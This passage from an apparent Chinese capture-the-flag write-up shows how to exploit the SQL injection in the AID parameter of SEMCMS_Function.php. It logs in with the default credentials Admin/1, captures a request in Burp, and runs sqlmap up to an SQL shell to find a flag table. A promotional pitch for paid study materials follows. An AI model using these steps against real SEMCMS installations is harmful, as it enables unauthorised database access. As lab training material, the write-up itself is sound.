4、修改“数据库服务器”为127.0.0.1,点击“开始安装”
返回连接数据库名 mycms 错误: Unknown database ‘mycms’,
5、修改“数据库名称”为:semcms,开始安装
安装成功
根据安装界面返回信息,得知后台默认帐户:Admin 密码:1
6、点击“点击转到后台”,打开后台登录界面,使用“帐户:Admin 密码:1”登录
登录成功
7、根据提示“该漏洞源于SEMCMS_Function.php 中的 AID 参数包含 SQL 注入”,结合
8、进入“产品管理”-选购一款产品-“批量上架”,使用bp抓包
9、保存抓包文件为55.txt
10、使用sqlmap注入
sqlmap.py -r 55.txt --batch
发现存在注入
11、查找数据库
sqlmap.py -r 55.txt --dbs --batch
12、进入–sql-shell,搜索flag在哪个表里
sqlmap.py -r 55.txt --sql-shell
SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME FROM information_schema.COLUMNS WHERE COLUMN_NAME = 'flag' limit 2,1
13、找到“flag”在“semcms数据库”的“flllaaaag表里”
14、搜索flag
最后
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.youkuaiyun.com/topics/618653875)
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
